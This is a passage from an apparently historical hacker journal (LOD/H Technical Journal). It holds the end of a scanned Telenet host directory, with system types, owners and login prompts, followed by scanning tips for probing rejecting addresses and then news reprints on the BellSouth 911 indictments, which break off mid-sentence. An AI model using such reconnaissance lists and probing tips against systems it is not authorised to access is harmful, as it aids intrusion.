   491     PRIME          ROCH 
   492     PRIME          MELVLE 
   493     PRIME          STMFRD 
   499     PRIME          SYRA 
   501     PRIME          OASC 
   502     PRIME          APPLE 
   510     PRIME          EN.C06 
   515     UNIX 
   516     PRIME          PBN38 
   517     PRIME          PBN38 
   518     PRIME          BDSA 
   519     PRIME          PBN54 
   520     PRIME          PBN57 
   525     PRIME          IRI System 8 
   530                    Maxlink 
   541     PRIME          BDSS 
   543     PRIME          PBN37 
   550     PRIME          B01 
   551     PRIME          CSP-A 
   553     PRIME          BDSQ 
   556     PRIME 
   558     PRIME          CSSS.A 
   560     PRIME          BDSN 
   562     PRIME          BDS2 
   563     PRIME 
   568     PRIME          OASI 
   575     PRIME          PBN50 
   577     PRIME          B30 
   578     PRIME          B04 
   583     PRIME          MD.HFD 
   587     PRIME          TR.SCH 
*  588 
$  589 
*  590 
   591     PRIME          EN.M19 
   593     PRIME          BDSO 
   596     PRIME          MKT 
   597     PRIME          BDSB 
   599     PRIME          OASJ 
   618     UNIX 
*  623 
   641     AOS            Timeplace Inc. 
   649                    PAPERCHASE 
   654     PRIME          IRI System 9 
   710     PRIME          MD.ATC 
   711     PRIME          AESE01 
   713     PRIME          PEACH 
   716     PRIME          WAYNE 
   717     PRIME          ETHEL 
   718     PRIME          BUGS 
   722     PRIME          PBN31 
   723     PRIME          MD.NJ 
   724     PRIME          NYMCS 
   725     PRIME          PRNCTN 
   726     PRIME          NJCENT 
   736     VAX            Butterworths 
   737     VAX                  " 
$  840     PRIME          WALTHM 
   850     PRIME          MD-CHI 
   851     PRIME          PBN30 
   852     PRIME          MD.LP1 
   855     PRIME          TRNG.C 
   856     PRIME          CS.CHI 
   857     PRIME          CS.OAK 
   858     PRIME          CS-DEN 
   859     PRIME          AWCE02 
   861     PRIME          PTCDET 
   862     PRIME          DRBN1 
   864     PRIME          CS.DET 
   865     PRIME          MD.DET 
   866     PRIME          MD.DAC 
   867     PRIME          ACEC01 
   868     PRIME          MD.GR 
   870     PRIME          CS.IND 
   871     PRIME          MD.IND 
   872     PRIME          MD.PIT 
   873     PRIME          ACMC01 
   874     PRIME          PITTCS 
   875     PRIME          MD.CLE 
   902     PRIME          MD.HOU 
   905     PRIME          OASG 
   908     PRIME          WMCS 
   910     PRIME          CSWDC 
   911     PRIME          VIENNA 
   912     PRIME          BALT 
   928     PRIME          CS.HOU 
   930     PRIME          MD.AUS 
   931     PRIME          CS.SCR 
   937     PRIME          TRNED 
   957     PRIME          ZULE 
   958     PRIME          EDOC1 
   959     PRIME          FUZZY 
   962     PRIME          PBN49 
*  971 
*  972 
*  973 
*  974 
   980     PRIME          WUFPAK 
   981     PRIME          WMMKT 
   986 
   993                    CU-Manchester- 
   995     PRIME          ATC55 
   996     PRIME          PBN65 
   998     PRIME          TRNGB 
   3088    VAX            DELPHI 
 
619--CALIFORNIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  31                     Environment Ctrl Monitor 
   41      VM/370 
*  51 
   56 
   57 
$  62      AOS 
$  63      AOS 
 
 
626--UNKNOWN--ADDRESSES SCANNED:  VARIOUS 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  1000    PRIME 
$  1002    VAX            Pacific Gas & Electric 
 
 
703--VIRGINIA--ADDRESSES SCANNED:  0-1300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  32 
$  33      AOS 
   40      VAX 
   41      VAX 
$  42                     ENTER USERID: 
   44      AOS            Project HOPE 
$  53      HP-3000 
   55                     ENTER SWITCH CHARS 
   141                    enter /login 
   142                         " 
   160     VAX 
   163a 
$  168 
*  176 
$  177     AOS 
*  206 
*  207 
$  253     AOS 
$  254     AOS 
$  255     AOS 
$  256     AOS 
$  257     AOS 
$  262     AOS 
*  340 
*  341 
*  342 
$  344                    ** NETWORK SIGN-ON FAILED: 
*  346 
   367                    P.R.C. 
   371                    P.R.C. 
*  377 
   431                    TACL 1> 
*  460 
*  461 
$  463     DEC-20 
*  464 
$  466     DEC-20 
*  467 
$  468 
$  469     Decserver 
*  470 
   511                    bcs network 
   512                    bcs network 
   530                    bcs network 
$  1000                   FCC FIRSTRA' 
$  1001                   FCC FIRSTRA' 
 
 
704--NORTH CAROLINA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  31      AOS 
$  32      AOS 
*  60 
*  61 
*  62 
$  63      AOS 
*  64 
*  168 
   170 
   171 
   173 
 
 
707--CALIFORNIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  48      AOS 
$  49      AOS 
$  50      AOS 
$  51      AOS 
$  52      AOS 
 
 
711--UNKNOWN--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   15      PRIME 
 
 
713--TEXAS--ADDRESSES SCANNED:  0-500 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  24                     PC Pursuit Dialer (2400) 
*  42 
$  43                     ID 
$  44                     ID 
*  58 
   73      PRIME          TXNODE 
   76                     %u@IUeASID@cAbR@CUDEz 
   77                              " 
   79                              " 
   80                              " 
   81                              " 
$  113                    PC Pursuit Dialer (300) 
$  114                    PC Pursuit Dialer (1200) 
   146                    %u@IUeASID@cAbR@CUDEz 
*  167 
*  224 
*  227 
*  228 
*  232 
*  234 
$  238     HP-3000 
   239                    Compaq 
   255     PRIME          SYS1 
$  260     PRIME          HOUSTN 
   276 
*  335 
   336     PRIME          GANODE 
   340a 
   345                    COMM520 
   346a                   Telenet Async to 3270 
$  364     VAX 
   366     PRIME          CANODE 
   368     PRIME          MANODE 
$  371                    Coca-Cola Foods 
   431 
 
 
714--CALIFORNIA--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  4                      PC Pursuit Dialer (2400) 
$  23                     PC Pursuit Dialer (300) 
$  24                     PC Pursuit Dialer (1200) 
$  33                     911 Monitor ECM 
$  41                     AGS 
   48      PRIME          TWCALF 
   49                     SERVICE ID= 
$  55      HP-3000 
$  62      AOS 
$  63      AOS 
$  64      AOS 
$  65      AOS 
$  66      AOS 
$  67      AOS 
$  68      AOS 
   72      PRIME          FSCOPE 
$  102                    PC Pursuit Dialer (2400) 
$  119                    PC Pursuit Dialer (300) 
$  121                    PC Pursuit Dialer (1200) 
$  130                    MMSA 
   131     PRIME          CAJH 
*  133 
*  145 
$  160     HP-3000 
*  164 
   166     HP-3000 
*  167 
*  168 
*  169 
   171                    COMMAND UNRECOGNIZED 
   172                            " 
*  178 
$  210                    PC Pursuit Dialer (300) 
$  213                    PC Pursuit Dialer (1200) 
$  240     AOS 
   246                    COMMAND UNRECOGNIZED 
$  272     AOS 
*  273 
$  274     AOS 
$  275     AOS 
$  276     AOS 
 
 
716--NEW YORK--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   23                     enter user code please 
   25                               " 
   31      HP-3000 
   50 
   130                    enter logon request- 
   131                            " 
   133                            " 
$  135     VAX 
 
 
717--PENNSYLVANIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   8       VM/370 
*  24 
*  31 
*  32 
*  33 
*  34 
   40      PRIME          IREX 
   42      PRIME          IREX 
   45      VOS 
   46      VOS 
   47                     Camp Hill Mgt. Info Center 
   48                                " 
   50 
   51                     Telenet Async to 3270 
   52a                    Telenet Async to 3270 
   53 
*  150 
*  153 
*  154 
*  160 
*  161 
*  162 
*  163 
 
 
801--UTAH--ADDRESSES SCANNED:  0-500 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  12                     PC Pursuit Dialer (2400) 
$  20                     PC Pursuit Dialer (300) 
$  21                     PC Pursuit Dialer (1200) 
   24                     Wasatch System 
   25                           " 
   26                           " 
   27                           " 
$  35                     ID 
*  37 
$  39      AOS 
$  44      AOS 
$  49      AOS 
$  52      AOS 
$  54      VAX 
$  57      AOS 
$  60      AOS 
$  62      AOS 
$  65      AOS 
$  130     AOS 
   144 
*  150 
$  151     AOS 
*  152 
$  153     AOS 
   176 
$  231     AOS 
$  232     AOS 
$  239     AOS 
   250                    ID?> 
   257 
   258 
 
 
802--VERMONT--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  31      AOS 
$  32      AOS 
$  33                     ID 
*  35 
*  36 
$  37      AOS 
$  38      AOS 
 
 
803--SOUTH CAROLINA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  30 
*  32 
$  50 
$  51                     KEMET ELECTRONICS 
*  55 
   60                     Telenet Async to 3270 
   61a                    Telenet Async to 3270 
$  70      AOS 
*  71 
*  74 
$  77      AOS 
   131                    Kemet 
   132a                   Telenet Async to 3270 
*  133 
$  135     PRIME          PRISM 
 
 
804--VIRGINIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   35      VAX 
*  43 
*  45 
$  60                     ID 
*  61 
*  62 
*  155 
$  160     AOS 
 
 
805--CALIFORNIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
   50      VAX 
   51      VAX 
*  58 
*  59 
*  60 
*  61 
*  62 
*  63 
*  64 
*  65 
*  74 
   90 
   100 
   101     UNIX           salt.acc.com 
   130 
   150     PRIME          MBM 
 
 
808--HAWAII--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  40      VAX 
   100     PRIME 
 
 
811--GTE--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  15 
   17      HP-3000 
   21      UNIX           GTE RPU2 
   22      UNIX           GTE IPU 
   24      UNIX           GTE RPU1 
   25                     TACL 1> 
   28                     TACL 1> 
   118                    CANNOT EXEC! 
   123     HP-3000 
*  129 
*  143 
*  217 
*  219 
 
 
812--INDIANA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
 
 
813--FLORIDA--ADDRESSES SCANNED:  0-700 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  20                     PC Pursuit Dialer (300) 
$  21                     PC Pursuit Dialer (1200) 
*  33 
   35      PRIME          S9750 
   43                     ** 4200 TERMINAL TYPE: 
$  52      DEC-20         Price Waterhouse 
$  53      VAX 
$  55                     PRICE WATERHOUSE 
$  59                     Telenet Async to 3270 
   73      VM/370 
   74                     ** 4200 TERMINAL TYPE: 
*  76 
$  124                    PC Pursuit Dialer (2400) 
   131                    IBM INFORMATION SERVICES 
   143                             " 
   147                             " 
*  148 
*  151 
*  153 
*  154 
   160     VAX 
   161     VAX 
   164     VAX 
*  165 
   166a                   Telenet Async to 3270 
*  167 
$  169     GS/1 
   172                    IBM INFORMATION SERVICES 
   174                             " 
   210 
   214 
   215 
   218 
*  222 
$  225                    ----SECURITY SUBSYSTEM---- 
$  226                                " 
*  265 
   267                    IBM INFORMATION SERVICES 
$  268                    U#= 
   269a    VAX            Addidas 
   271                    Access Code: 
   272     PRIME 
   275                    Access Code: 
   277                    U#= 
*  330 
   344                    TACL 1> 
   346                      " 
   350     VAX 
*  351 
   355 
*  360 
*  361 
   430                    Telenet Async to 3270 
   431a                   Telenet Async to 3270 
   436                    U#= 
   438     VAX            DEC/ETONIC 
*  460 
   465                    Martin Marietta 
   466                    Martin Marietta 
   467                    Enter Switch Characters 
   468                            " 
   660 
 
 
814--PENNSYLVANIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   50      PRIME          SYSA 
*  53 
$  130     VAX 
$  137     AOS 
 
 
816--MISSOURI--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   36 
*  38 
*  43 
$  44      AOS 
*  45 
$  57      AOS 
$  58      AOS 
*  59 
$  62 
   77 
$  104                    PC Pursuit Dialer (300) 
$  113                    PC Pursuit Dialer (1200) 
$  150 
*  157 
*  161 
   189                    CDCNET 
 
 
817--TEXAS--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  33 
$  35      PRIME          FWRTH 
*  36 
*  37 
   141     VAX            Tandy Information Service 
*  160 
*  161 
*  162 
 
 
818--CALIFORNIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  20 
$  21                     PC Pursuit Dialer (1200) 
*  29 
*  50 
$  130 
*  139 
 
 
888--GTE HAWAIIAN TELEPHONE--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  25 
$  51 
*  52 
$  53      PRIME          HAWAII 
*  30 
*  45 
*  50 
 
 
890--UNKNOWN--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  100                    ADTN USER ID 
$  102                         " 
$  103                         " 
$  109     GS/1 
$  110                    ADTN USER ID 
$  125                         " 
$  126                         " 
$  129                         " 
 
 
901--TENNESSEE--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  30 
*  134 
 
 
904--FLORIDA--ADDRESSES SCANNED:  0-400 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  34      AOS 
$  41      AOS 
$  45      AOS 
$  50      AOS 
   51                     COMMAND UNRECOGNIZED 
   52                     COMMAND UNRECOGNIZED 
   53                     COMMAND UNRECOGNIZED 
$  55      AOS 
$  56      AOS 
$  58                     ID 
*  60 
   141 
*  160 
*  161 
   232 
*  235 
 
 
907--ALASKA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  31                     ID 
*  32 
$  33      AOS 
*  34 
$  35      AOS 
$  44 
$  45      AOS 
*  46 
$  47      AOS 
$  48      AOS 
*  50 
*  51 
$  130     AOS 
   138 
 
 
909--TELENET--ADDRESSES SCANNED:  0-1000 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  3                      Telenet Port 
   8       PRIME 
   9       PRIME 
   10      PRIME 
   12      PRIME 
   13 
   14                     Telenet Port 
   23      PRIME 
   26      PRIME 
   27      PRIME 
   38      PRIME 
   39                     USER ID 
   44      PRIME 
   52 
   53      PRIME 
   54 
   56      PRIME 
   60      PRIME 
   61      PRIME 
   62      PRIME 
   63      PRIME 
   65      PRIME 
   73      PRIME 
   77      PRIME 
   78      PRIME 
   79                     MHP201A 
   90      PRIME 
   92      PRIME 
   94      PRIME 
   95      PRIME 
   97      PRIME 
   98      PRIME 
   100     PRIME 
   101                    USER ID 
   102                    USER ID 
   104 
   117     PRIME 
   123     PRIME 
   130     PRIME 
   131     PRIME 
   136     PRIME 
   137     PRIME 
   139     PRIME 
   141     PRIME 
   143     PRIME 
   144     PRIME 
   146     PRIME          Telemail 
   147     PRIME              " 
   148     PRIME              " 
   149     PRIME              " 
   151 
   153                    TACL 1> 
   154                       " 
   155     PRIME          Telemail 
   158     PRIME              " 
   159     PRIME              " 
   160     PRIME              " 
   161     PRIME              " 
   162     PRIME 
   165     PRIME          Telemail 
   168     PRIME              " 
*  170 
   171 
   172 
   173     PRIME 
   176     PRIME 
   178                    USER ID 
   179                       " 
   184                       " 
   187 
   197 
   198 
   205     PRIME 
   206     PRIME 
   235     PRIME 
   236     PRIME 
   239     PRIME 
$  312                    !Load and Function Tester 
$  314                               " 
   316                               " 
$  317                               " 
   318                               " 
   319                               " 
   325 
   328                    !Load and Function Tester 
   330                    FRAME TESTER? 
   338                    !Load and Function Tester 
   400     PRIME          Telemail 
   401     PRIME              " 
   403     PRIME              " 
   404     PRIME              " 
   406     PRIME              " 
   407     PRIME 
   408     PRIME 
   409     PRIME 
   508     PRIME 
   600     VAX 
   615     PRIME 
   622     PRIME 
   623     PRIME 
   624     PRIME 
   626     PRIME 
   627     PRIME 
   628     PRIME 
   629     PRIME 
   630     PRIME 
   631                    PC Pursuit BBS 
   632 
   633 
   634 
   635 
   643     PRIME 
   646 
   650     PRIME 
   651     PRIME 
   656 
   657 
   658 
   659 
   660 
   661 
   663 
   664 
   675     PRIME 
   676     PRIME 
   677     PRIME 
   678     PRIME 
   679     PRIME 
   680     PRIME 
   686                    Telenet FE BBS1 
   747 
   751                    TELENET MUS/XA NETWORK 
   761     PRIME          Telemail 
   762     PRIME 
   763     PRIME 
   764                    Telenet Async to 3270 
   767                    TELENET NUS/XA NETWORK 
   770     PRIME 
   772     PRIME 
   773     PRIME 
   777                    Telenet Async to 3270 
   779                             " 
   781                             " 
   782                             " 
   784                             " 
   798     PRIME 
   799     PRIME 
   800     PRIME 
   801     PRIME 
   805     PRIME 
   810     PRIME 
   811     PRIME 
   815     PRIME 
   816     PRIME 
   817     PRIME 
   818     PRIME 
   819     PRIME 
   822     PRIME 
   823     PRIME 
   824     PRIME 
   825     PRIME 
   826     PRIME 
   827     PRIME 
   828     PRIME 
   830     PRIME 
   831     PRIME 
   832     PRIME 
   833     PRIME 
   834     PRIME 
   840     PRIME          Telemail 
   841     PRIME              " 
   842     PRIME              " 
   843     PRIME              " 
   844     PRIME              " 
   845     PRIME              " 
   846 
   847 
   848     PRIME          Telemail 
   893     PRIME 
   894     PRIME 
   900     PRIME 
   901     PRIME 
   902     PRIME 
   911     PRIME 
   912     PRIME 
 
 
910--TELENET--ADDRESSES SCANNED:  VARIOUS 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   100     PRIME 
   200     PRIME 
   300     PRIME 
   400     PRIME 
   500     PRIME 
 
 
912--GEORGIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   30 
*  31 
 
 
913--KANSAS--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  32                     ID 
*  34 
$  150     PRIME          TOPEKA 
 
 
914--NEW YORK--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  32      VM/370 
   33      VM/370 
   34                     >> 
   35                     >> 
*  38 
$  41      VM/370         Pepsi 
*  42 
   50                     Mnematics 
   133 
*  160 
 
 
916--CALIFORNIA--ADDRESSES SCANNED:  0-700 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  7                      PC Pursuit Dialer (2400) 
$  11                     PC Pursuit Dialer (300) 
$  12                     PC Pursuit Dialer (1200) 
$  30      AOS 
$  33      AOS 
$  34      PRIME          SACRA 
$  36                     ID 
$  39      AOS 
$  40      AOS 
$  41                     ID 
   55      PRIME          FIMSAC 
$  56      AOS 
$  57      AOS 
$  58      AOS 
$  59      AOS 
$  63      AOS 
$  64      AOS 
$  130     AOS 
$  131     AOS 
$  132     AOS 
$  133     AOS 
$  134     AOS 
$  141     AOS 
$  168     AOS 
*  169 
*  171 
$  232     AOS 
$  233     AOS 
*  234 
$  235     AOS 
$  236     AOS 
   240 
   268                    Telenet Async to 3270 
*  330 
*  331 
*  332 
*  333 
*  334 
*  335 
*  336 
*  337 
*  338 
*  339 
   350 
*  360 
*  361 
*  362 
*  363 
*  364 
*  365 
*  366 
*  367 
*  368 
*  369 
$  530 
*  531 
   607     UNIX           IPA State Net 
   608     UNIX           IPA State Net 
 
 
918--OKLAHOMA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30                     ID 
   40                     CUSTOMER ID: 
   105                    American Airlines 
   130                    American Airlines 
 
 
919--NORTH CAROLINA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  20                     PC Pursuit Dialer (300) 
$  21                     PC Pursuit Dialer (1200) 
$  33                     ID 
$  34      AOS 
*  36 
*  38 
   43                     enter system id 
   44                            " 
   46                            " 
   47      VM/370         Northern Telcom 
*  58 
$  59      AOS 
*  60 
$  70      HP-3000 
$  124                    PC Pursuit Dialer (2400) 
$  130     HP-3000 
   135                    USA TODAY Sports Center 
*  139 
$  145 
*  158 
*  159 
 
 
MNEMONIC ADDRESSES 
------------------ 
 
$  AFS 
   APPLE 
   BCS 
   BIONET 
   BLUE 
   BRS 
   CCC03 
   CMS 
$  COM 
   D30 
   D31 
   D32 
   D33 
   D34 
   D35 
   D36 
   D37 
   D41 
   D42 
   D43 
   D44 
   D45 
   D46 
   D50 
   D51 
   D52 
   D53 
   D54 
   D55 
   D56 
   D57 
   D58 
   D61 
   D62 
   D63 
   D64 
   DELPHI 
   DOW 
   DUNS 
   EIES 
   GOLD 
   GTEM 
   HHTRAN 
   INFO 
   IRIS 
   MMM 
   MUNI 
   NASA 
   NET 
   NSF 
   OAG 
   OLS 
   ORBIT 
   PORTAL 
   PRIME 
   S10 
   S11 
   S12 
   S13 
   S14 
   S15 
   S16 
   S17 
   S18 
   S19 
   SIS 
   SIT 
   SPR 
   STK1 
   STK2 
   STK3 
   STK4 
   SUMEX 
   USIBM 
   USPS 
   VUTEXT 
 
 
 
PC-PERSUIT DIALERS 
------------------ 
 
C D/CITY/BAUD,ID,PASSWORD 
 
A/C        CITY 
---        ----- 
201        NJNEW 
202        DCWAS 
203        CTHAR 
206        WASEA 
212        NYNYO 
213        CALAN 
214        TXDAL 
215        PAPHI 
216        OHCLV 
303        CODEN 
305        FLMIA 
312        ILCHI 
313        MIDET 
314        MOSLO 
404        GAATL 
408        CASJO 
414        WIMIL 
415        CAPAL 
415        CASFA 
503        ORPOR 
602        AZPHO 
612        MNMIN 
617        MABOS 
619        CASAD 
713        TXHOU 
714        CARIV 
714        CASAN 
801        UTSLC 
813        FLTAM 
816        MOKAN 
818        CAGLE 
916        CASAC 
919        NCRTP 
 
 
 
TELENET SCANNING TIPS 
-------------------- 
 
There are a few things to take into consideration when using Telenet. 
First of all, ignore error messages!  When something says rejecting, or 
illegal address, or remote procedure error, try it again using sub- 
addresses.  (IE:  100100a, 100100b...100100.99)  I have also found that 
some addresses that are rejecting merely require that you connect to it 
using an id.  Many of the things that respond with illegal address are 
telenet pads.  Most of the public pads are in the following ranges:  0-20, 
80-100, 180-190.  Many times you will find private pads.  If you are very, 
very lucky you will find that pad-to-pad connections are possible to these 
privately owned pads.  However, most of the time they are not operating, so 
your chances of actually picking anything up are very slim. 
 
When I did this directory I only checked the first few sub addresses on 
addresses that didn't immediately connect, so needless to say there are 
still a vast amount of systems out there.  One address I have responds with 
rejecting until you connect to the sub address 74!  Imagine trying to go 
that far on each of the thousands of rejecting and illegal addresses I 
obtained in my scanning!  Maybe some other time. 
 
There are several areas that I scanned that are not in this directory. 
Mainly, these are areas where I didn't find anything.  So you don't waste 
your time, all hosts in Canada are served through Datapac, so there is 
nothing in areas prefixed with a Canadian area code.  There are also many 
US areas that I guess are still striving for the Industrial Revolution, and 
therefore have no systems online.  There are also several privately owned 
prefixes that I didn't scan just because it would be a pain in the ass, 
above and beyond the pain involved doing the main scanning.  The major ones 
are 622 (NYNEX), 891, 892, 893, & 894 (OWNERS UNKNOWN).  There are also a 
few others that go up and down daily, depending upon their mood.  I 
wouldn't suggest that you all immediately start hacking these prefixes; 
mainly because you will need an ID just to get a response other than 
refused collect connection. 
 
Lastly, if anyone finds any errors in the directory, or finds anything I 
omitted, let me know, and I'll revise it.  Also, if anyone would like a 
copy of the telix script I used to do this scanning, let me know.  This was 
a bitch to do, but I think it was worth the trouble.  The next update won't 
be for a year, as this should suffice for at least that long. 
 
 
============================================================================== 
              End of Second Half of LOD/H Telenet Directory, Rev. #5 
============================================================================== 
The LOD/H Technical Journal, Issue #4: File 10 of 10. 
 
 
 
                          NETWORK NEWS AND NOTES 
                          ---------------------- 
 
 
The Network News and Notes file contains reprints of articles that are of 
interest to the majority of our intended readers. In this installment we 
borrowed heavily from the CFCA (Communications Fraud Control Association) 
Communicator since the newsletter deals specifically with issues relevant to 
our readers. The CFCA is "a nonprofit educational organization founded in 
1985 to help the telecommunications industry combat fraud." 
 
Overall, do not let the titles mislead you. Every article contains interesting 
and we hope useful information. Be sure to take the time and read into them 
before skipping. Some are a little old but better late than never. If anyone 
comes across any articles of interest, we would like to know about them. One 
more note, all comments within brackets [], are remarks made by one of 
the TJ editors. 
 
The first two articles, as was stated in the Introduction, relate the various 
trouble some noted members of the community ran into. 
 
______________________________________________________________________________ 
 
 
Source: The Wall Street Journal 
Issue: Wednesday, February 7, 1990 
Title: Computer Hackers Accused of Scheme Against BellSouth 
Author: Thomas M. Burton 
 
 
   CHICAGO--Federal grand juries in Chicago and Atlanta indicted four computer 
hackers in an alleged fraud scheme that authorities said could potentially 
disrupt emergency "911" telephone service throughout nine Southern States. 
 
   The men, alleged to be part of a closely knit cadre of computer hackers 
known as the Legion of Doom, gained access to the computer system, controlling 
telephone emergency service of BellSouth Corp., the Atlanta-based 
telecommunications giant. 
 
   BellSouth, through two subsidiaries, oversees phone service in Alabama, 
Mississippi, Georgia, Tennessee, Kentucky, Louisiana, Florida, and the 
Carolinas. 
 
   The Chicago indictment said members of the Legion of Doom are engaged in 
disrupting telephone service by entering a telephone company's computers and 
changing the routing of telephone calls. The hackers in the group also 
fraudulently obtain money from companies by altering information in their 
computers, the indictment said. 
 
 
   The hackers transferred stolen telephone-computer information from 
BellSouth to what prosecutors termed a "computer bulletin board system" 
in Lockport, Ill. In turn, the men planned to publish the computer data in a 
hackers' magazine, the grand jury charged. 
 
-----EDITOR'S NOTES: 
   As always, ignorance and falsehoods are abound in most articles of this 
nature. For the record, NO TELEPHONE SERVICE WAS INTENTIONALLY DISRUPTED DUE 
TO THE ACCUSED MEMBERS. Furthermore, NO MONEY FROM COMPANIES WAS EVER 
FRAUDULENTLY OBTAINED BY ALTERING INFORMATION IN THEIR COMPUTERS. These are 
the typical WILD accusations made by law enforcement and further distorted 
by the media in such cases. As for the bbs is Lockport, Ill. well it was 
simply a legitimate information storage and retrieval system used by many, 
many people for legitimate purposes of information exchange. It would be very 
time consuming for the operator of said system to check every file on the 
system as it was a UNIX based system with a lot of disk space. The hacker 
magazine stated above is simply Phrack, Inc. put out by Knight Lightning and 
Taran King. More comments after next article. 
 
 
_____________________________________________________________________________ 
 
Source: ComputerWorld 
Issue:  1990 
Title: Babes in high tech toyland nabbed 
Author: Michael Alexander 
 
   CHICAGO--- The U.S. Justice Department escalated its ware against computer 
crime last week with two indictments against members of an alleged computer 
hacker group, who are charged with stealing a copy of a 911 emergency computer 
program from BellSouth Telephone Co., among several other crimes. 
 
   In a seven-count indictment returned in Chicago, Robert X, 20 also known as 
"The Prophet", is alleged to have used a computer to steal a copy of a 
computer program owned and used by BellSouth that controls emergency calls to 
the police, fire, ambulance and emergency services in cities throughout nine 
Southern states. According to the indictment, after X stole the program -- 
valued at $79,449 -- he uploaded it to a computer bulletin board. 
 
   The Chicago indictment further alleges that Craig Y, 19, also known as 
"Knight Lightning" downloaded the 911 program to his computer at the 
University of Missouri in Columbia, Mo., and edited it for publication in 
"Phrack", a newsletter for computer hackers. 
 
   X and Y allegedly intended to disclose the stolen information to other 
computer hackers so that they could unlawfully access and perhaps disrupt 
other 911 services, the Chicago indictment charged. 
 
   In a second indictment returned in Atlanta, X and two others were charged 
with additional crimes related to BellSouth systems. 
 
   All four hackers allegedly are members of the Legion of Doom, described in 
the indictments "as a closely knit group of about 15 computer hackers", in 
Georgia, Texas, Michigan and several other states. 
 
   BellSouth spokesmen refused to say when or how the intrusion was detected 
or how a computer hacker was able to lift the highly sensitive and proprietary 
computer program. 
 
   "Hopefully, the government's action underscores that we do not intend to 
view this as the work of a mischievous prankster playing in a high-tech 
toyland", one spokesman said. 
 
   A source within BellSouth said that much of what the hacker took was 
documentation and not source code. "They did not disrupt any emergency 
telephone service, and we are not aware of any impact on our customers", the 
source said. 
 
   William Cook, an assistant U.S. attorney in Chicago, declined to comment on 
